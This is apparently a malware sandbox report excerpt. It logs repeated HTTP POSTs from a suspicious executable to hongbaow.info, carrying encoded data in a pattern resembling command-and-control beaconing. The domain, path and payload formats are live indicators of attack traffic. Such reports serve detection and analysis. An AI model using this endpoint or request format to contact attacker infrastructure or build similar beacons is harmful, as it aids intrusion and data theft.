                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jvjr4KqYPyjU2w7f3Hm4Osu93mUEBBtlZ7mWAzQcJkb1c6%2B5sy7V0CKGHNR3aPAEyn5315tzV2zWj%2B9GK8MMAgXqGhSgs8nB27P%2BgrlRQ0%2F2lS8aP%2BN1pusg7q2j%2FAOl"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de91f9d9af5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1443&min_rtt=1438&rtt_var=550&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1971640&cwnd=107&unsent_bytes=0&cid=2bcf097a96a17399&ts=326&x=0"
                                      2025-01-22 07:43:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.456077104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:03 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:03 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:03 UTC814INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:03 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0qmIsbWu%2FXw8KBGBLDr3fVPD5bfL96Y79eVPrhH8q%2BQgAGq5FXHJJlu0%2BcDKqoPMjluKc2g1gGHPMPsiMFIkzh5ZNJ%2BzElT4lGd%2FreAlxWO6XQLME%2BkuWgCFyb4S3IQk"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de92d2c788ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1768&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1603514&cwnd=162&unsent_bytes=0&cid=692ff5ff3ae48fc4&ts=343&x=0"
                                      2025-01-22 07:43:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.456088104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:04 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:04 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:05 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:05 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rRgXDQmjwvftdthHY8%2BbPg57fhtjXEZjJzfqupq1uY9YFtUbDSytM%2B4KqGMNiC53slis4AHk4ukzGhcPA5eU%2BnxspWUnPNZm2zFkojptZrhn%2BxDbgpIAQAu8gMu6Bg3n"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9374cda8c11-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1822&rtt_var=693&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1569048&cwnd=203&unsent_bytes=0&cid=e6736e399ccac983&ts=328&x=0"
                                      2025-01-22 07:43:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.456114104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:08 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:08 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:08 UTC807INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:08 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j7sFAntX%2B39GFWWen9ztnCUUGmvSQP5HLrJ7bwfhSeusqdYVIhikKK5CGbqDsTFtcDbGmMz9pjrjnJVz6Qo%2Bg3SsHcCcuDOq%2FmAxkKIu1Plx3PiPBoOak8JPpan6RV60"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de94f59f043be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1539&min_rtt=1535&rtt_var=585&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1857506&cwnd=231&unsent_bytes=0&cid=afbc5449d6650629&ts=362&x=0"
                                      2025-01-22 07:43:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.456119104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:08 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:08 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:09 UTC804INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:09 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOAzJw9UPZHc6swt8x7tmHkU%2BUzr1oEom0ZbdtUjFgKukWYATgv0qngJDzLHfm90sed03g3V8kancOZcUDW1TFQmHrlSt9uAJI9bMvqAUVabzddxfbAViTJvjnyjLoDS"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de951ab1543be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1570&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1830721&cwnd=231&unsent_bytes=0&cid=7112dccc4e51530c&ts=329&x=0"
                                      2025-01-22 07:43:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.456141104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:12 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:12 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:12 UTC811INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:12 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFnMLf%2BlHBe78Kb3X3Y8G8VV8MtdCjN0%2FGWu1jlKrlH4tJfBtUn3SmGSwE4XXAQr%2B4E35i63K6cVcQZbAa80nO0WTJz9fsMsmYREH3lf3EaVI4XQd8G7ihXDmUxKZ%2BUU"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9680cc88ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1758&rtt_var=685&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1568206&cwnd=162&unsent_bytes=0&cid=69d040562aef37b7&ts=483&x=0"
                                      2025-01-22 07:43:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.456157104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:14 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:14 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:15 UTC810INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:15 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=icvdL3COMlDvPnANDt7JOGNYPtkYwtoDKRhdVKIFlk5zE91XpfTduUhf5S1H5KkV%2BiAP0rEk8CW%2F753VG2NcySgIjmhBpiyeXt%2FFTisyExeEQ4A8lZcTdZTSe%2BhObe1U"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9763ca4c470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1444&min_rtt=1438&rtt_var=552&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1959731&cwnd=219&unsent_bytes=0&cid=c89e3033bf2e967b&ts=520&x=0"
                                      2025-01-22 07:43:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.456168104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:16 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:16 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:16 UTC815INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:16 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RYUfC1TOqc0RfiuVR%2FIuhcSZTmCEQRd6RjhCMdCqD7sm2l5p0iZymI8VxU66zo%2BJ6eb4Lac9xaDvCJDkt9ZOLgGk%2BjxThxHdK%2Blc3A%2BEbR1%2F%2B8glbT5jUUYAC7yS0ROV"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de97ffd9e8c11-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1749&rtt_var=664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1636771&cwnd=203&unsent_bytes=0&cid=4172ef1838c3a1f6&ts=333&x=0"
                                      2025-01-22 07:43:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.456193104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:20 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:20 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:20 UTC811INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:20 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtZuUYO76UGtPeVYeR2aFf%2BUuQsipfZ0elEnPR4m1zFjGGZ9B7n%2BqNKzsdMX8BLOCSTSoZ3TgBk%2BvPazJvK00y6T1Me8sPRWp2J2DiamleQpsOsoU%2FDFk5XzOI97FqeX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de997ba8b8ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1795&rtt_var=674&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1621321&cwnd=162&unsent_bytes=0&cid=65165dd2a09a205d&ts=335&x=0"
                                      2025-01-22 07:43:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.456194104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:20 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:20 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:21 UTC802INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:21 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlNEH5QHSJjsF6pZ4v1Zik8AISNKdvPTS4evvWN5RbGmrK4V74a6u5mjKpBaRkcfr5OQzXnPHrcInTsFQKMucUEznKb8hSSuFf2weBgpmQ1Z06Pu6x6wwVoCFpAJhwwh"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de99b9c8a43be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1590&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1785932&cwnd=231&unsent_bytes=0&cid=58cdf0cca16d2a74&ts=334&x=0"
                                      2025-01-22 07:43:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.456195104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:24 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:24 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:24 UTC805INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:24 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEImO%2B4qIY8iLP70CIz93RbCTxyRcPr5UBGlCeCfNBE4QJrCgtkSb4ZWwG%2FuoVCQJG5yDA8POIskiCLC2CglUtygNbWOwZdtUgIPXt6I2bBs70A3U5zsR9VyPrTun9X2"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9af9b9942eb-EWR
                                      alt-svc: h3=":443"; ma=86400
